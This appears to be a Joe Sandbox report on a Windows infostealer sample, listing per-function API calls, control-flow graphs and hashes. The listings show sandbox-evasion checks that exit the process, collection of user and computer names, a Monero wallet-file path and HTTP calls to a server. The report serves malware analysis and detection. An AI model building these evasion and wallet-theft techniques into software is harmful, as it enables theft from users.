                                  control_flow_graph 1301 e719f0-e71a1d call e7ade0 StrCmpCA 1304 e71a27-e71a41 call e7ade0 1301->1304 1305 e71a1f-e71a21 ExitProcess 1301->1305 1309 e71a44-e71a48 1304->1309 1310 e71c12-e71c1d call e7ab10 1309->1310 1311 e71a4e-e71a61 1309->1311 1313 e71a67-e71a6a 1311->1313 1314 e71bee-e71c0d 1311->1314 1316 e71a85-e71a94 call e7ab30 1313->1316 1317 e71b63-e71b74 StrCmpCA 1313->1317 1318 e71b82-e71b93 StrCmpCA 1313->1318 1319 e71b41-e71b52 StrCmpCA 1313->1319 1320 e71ba1-e71bb2 StrCmpCA 1313->1320 1321 e71bc0-e71bd1 StrCmpCA 1313->1321 1322 e71acf-e71ae0 StrCmpCA 1313->1322 1323 e71aad-e71abe StrCmpCA 1313->1323 1324 e71a71-e71a80 call e7ab30 1313->1324 1325 e71b1f-e71b30 StrCmpCA 1313->1325 1326 e71bdf-e71be9 call e7ab30 1313->1326 1327 e71afd-e71b0e StrCmpCA 1313->1327 1328 e71a99-e71aa8 call e7ab30 1313->1328 1314->1309 1316->1314 1339 e71b76-e71b79 1317->1339 1340 e71b80 1317->1340 1341 e71b95-e71b98 1318->1341 1342 e71b9f 1318->1342 1337 e71b54-e71b57 1319->1337 1338 e71b5e 1319->1338 1343 e71bb4-e71bb7 1320->1343 1344 e71bbe 1320->1344 1346 e71bd3-e71bd6 1321->1346 1347 e71bdd 1321->1347 1331 e71ae2-e71aec 1322->1331 1332 e71aee-e71af1 1322->1332 1329 e71ac0-e71ac3 1323->1329 1330 e71aca 1323->1330 1324->1314 1335 e71b32-e71b35 1325->1335 1336 e71b3c 1325->1336 1326->1314 1333 e71b10-e71b13 1327->1333 1334 e71b1a 1327->1334 1328->1314 1329->1330 1330->1314 1352 e71af8 1331->1352 1332->1352 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1346->1347 1347->1314 1352->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00E71A15
                                  • ExitProcess.KERNEL32 ref: 00E71A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 72555c330d295db9060b80c8178955c1aa97b3ead51cae7996b433dc91f5dd19
                                  • Instruction ID: 778222cd541c28b450d0038f24d4f37660c3fd27a6a01d88a6bd98ed37a0b87b
                                  • Opcode Fuzzy Hash: 72555c330d295db9060b80c8178955c1aa97b3ead51cae7996b433dc91f5dd19
                                  • Instruction Fuzzy Hash: 7F5170B4A0830AEFDB54DFE8D954AEE77B9EF44704F109098E41ABB284E770E944CB51
                                  Function 00E76C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017306D8), ref: 00E79BF1
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730798), ref: 00E79C0A
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017306A8), ref: 00E79C22
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730708), ref: 00E79C3A
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730558), ref: 00E79C53
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01738958), ref: 00E79C6B
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017258E8), ref: 00E79C83
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01725AE8), ref: 00E79C9C
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730678), ref: 00E79CB4
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730720), ref: 00E79CCC
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01730738), ref: 00E79CE5
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017307B0), ref: 00E79CFD
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,01725B48), ref: 00E79D15
                                    • Part of subcall function 00E79BB0: GetProcAddress.KERNEL32(75900000,017307E0), ref: 00E79D2E
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E611D0: ExitProcess.KERNEL32 ref: 00E61211
                                    • Part of subcall function 00E61160: GetSystemInfo.KERNEL32(?), ref: 00E6116A
                                    • Part of subcall function 00E61160: ExitProcess.KERNEL32 ref: 00E6117E
                                    • Part of subcall function 00E61110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E6112B
                                    • Part of subcall function 00E61110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E61132
                                    • Part of subcall function 00E61110: ExitProcess.KERNEL32 ref: 00E61143
                                    • Part of subcall function 00E61220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E6123E
                                    • Part of subcall function 00E61220: __aulldiv.LIBCMT ref: 00E61258
                                    • Part of subcall function 00E61220: __aulldiv.LIBCMT ref: 00E61266
                                    • Part of subcall function 00E61220: ExitProcess.KERNEL32 ref: 00E61294
                                    • Part of subcall function 00E76A10: GetUserDefaultLangID.KERNEL32 ref: 00E76A14
                                    • Part of subcall function 00E61190: ExitProcess.KERNEL32 ref: 00E611C6
                                    • Part of subcall function 00E779E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E611B7), ref: 00E77A10
                                    • Part of subcall function 00E779E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E77A17
                                    • Part of subcall function 00E779E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E77A2F
                                    • Part of subcall function 00E77A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77AA0
                                    • Part of subcall function 00E77A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E77AA7
                                    • Part of subcall function 00E77A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E77ABF
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E76D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00E76D99
                                  • Sleep.KERNEL32(00001770), ref: 00E76DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76DBA
                                  • ExitProcess.KERNEL32 ref: 00E76DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 63e4bf9fe0920e674e8c3937ef24747bf46a30c3d35207cfcae9ae7726c38e52
                                  • Instruction ID: c9a4d24fed48b24e598a9c542349512199ccf13575d6c5b83efcbe0a5ffba717
                                  • Opcode Fuzzy Hash: 63e4bf9fe0920e674e8c3937ef24747bf46a30c3d35207cfcae9ae7726c38e52
                                  • Instruction Fuzzy Hash: 6C314F71A40208ABDB15F7F0DC67AEE73B9AF40340F18A968F21AB6186DF705905C762
                                  Function 00E61220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 e61220-e61247 call e78b40 GlobalMemoryStatusEx 1439 e61273-e6127a 1436->1439 1440 e61249-e61271 call e7dd30 * 2 1436->1440 1442 e61281-e61285 1439->1442 1440->1442 1444 e61287 1442->1444 1445 e6129a-e6129d 1442->1445 1447 e61292-e61294 ExitProcess 1444->1447 1448 e61289-e61290 1444->1448 1448->1445 1448->1447
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E6123E
                                  • __aulldiv.LIBCMT ref: 00E61258
                                  • __aulldiv.LIBCMT ref: 00E61266
                                  • ExitProcess.KERNEL32 ref: 00E61294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: ce9e693353dbde043469b082f8d70f90096361f442ae88079ddaebab0fbf8cea
                                  • Instruction ID: ccc1d772336c81f573738f0c6fa78f883969fdc9f2fd7c57b7eaea7e506dc839
                                  • Opcode Fuzzy Hash: ce9e693353dbde043469b082f8d70f90096361f442ae88079ddaebab0fbf8cea
                                  • Instruction Fuzzy Hash: B201A2F0D80308FADB10DFE0DC4AB9DBBB8EF10705F149888E704B61D0C67455459758
                                  Function 00E76D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 e76d93 1451 e76daa 1450->1451 1453 e76dac-e76dc2 call e76bc0 call e75d60 CloseHandle ExitProcess 1451->1453 1454 e76d5a-e76d77 call e7ade0 OpenEventA 1451->1454 1460 e76d95-e76da4 CloseHandle Sleep 1454->1460 1461 e76d79-e76d91 call e7ade0 CreateEventA 1454->1461 1460->1451 1461->1453
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E76D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00E76D99
                                  • Sleep.KERNEL32(00001770), ref: 00E76DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01738828,?,00E810F4,?,00000000,?,00E810F8,?,00000000,00E80AF3), ref: 00E76DBA
                                  • ExitProcess.KERNEL32 ref: 00E76DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: e4847902ebe14e7a058a870c8558b5e0883f5eaa3466bc325715d1db67d2fb36
                                  • Instruction ID: 7ac00d4d5d9b29f36fdc623ff7d5996b3d926e5b33afcb4275bb951bf9bb7bb8
                                  • Opcode Fuzzy Hash: e4847902ebe14e7a058a870c8558b5e0883f5eaa3466bc325715d1db67d2fb36
                                  • Instruction Fuzzy Hash: 18F05E70A48609ABEB34FBA0DC0ABBE33B4AF04709F149525F62AB51C9CBB05940DB51
                                  Function 00E64800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 6d6fdd257683de100d845de2721af1dfdf8f0f5e37608186108dc42aca92e622
                                  • Instruction ID: 75b63ae326a6adeb7d04a94d2ec2a0291b899dfdcbfc32a0a883f48950e38d9b
                                  • Opcode Fuzzy Hash: 6d6fdd257683de100d845de2721af1dfdf8f0f5e37608186108dc42aca92e622
                                  • Instruction Fuzzy Hash: 1C213EB1D00209ABDF14DFA5EC46ADD7BB5BB44320F109625F925B72D0DB706A09CB91
                                  Function 00E75440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E662D0: InternetOpenA.WININET(00E80DFF,00000001,00000000,00000000,00000000), ref: 00E66331
                                    • Part of subcall function 00E662D0: StrCmpCA.SHLWAPI(?,0173E308), ref: 00E66353
                                    • Part of subcall function 00E662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E66385
                                    • Part of subcall function 00E662D0: HttpOpenRequestA.WININET(00000000,GET,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E663D5
                                    • Part of subcall function 00E662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E6640F
                                    • Part of subcall function 00E662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E66421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E75478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 110791a1e06b7b58ccf5152935c7acfb739454086e638cbdee6108ba26b8486f
                                  • Instruction ID: 1f0956911ae35c67a9218a939ead396c438e688275d3516de53cd204757cf677
                                  • Opcode Fuzzy Hash: 110791a1e06b7b58ccf5152935c7acfb739454086e638cbdee6108ba26b8486f
                                  • Instruction Fuzzy Hash: 0711F1319101089BCB14FFA4DD52AED73B99F90340F549578F91E67492EF30AB05C751
                                  Function 00E77A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00E77ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: e0ba56827a2d5f02281401a404824a707ed5b376ea38bd684454fa70f8561a5b
                                  • Instruction ID: f2c743deda951be01c840cbbb3a36ea0675980d0c541881de4332e9de75f1e9c
                                  • Opcode Fuzzy Hash: e0ba56827a2d5f02281401a404824a707ed5b376ea38bd684454fa70f8561a5b
                                  • Instruction Fuzzy Hash: 8401A2B1908209ABD714CF88D845BAEBBB8FB04710F100229F519B2280D3B45A00C7A1
                                  Function 00E61110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E6112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E61132
                                  • ExitProcess.KERNEL32 ref: 00E61143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
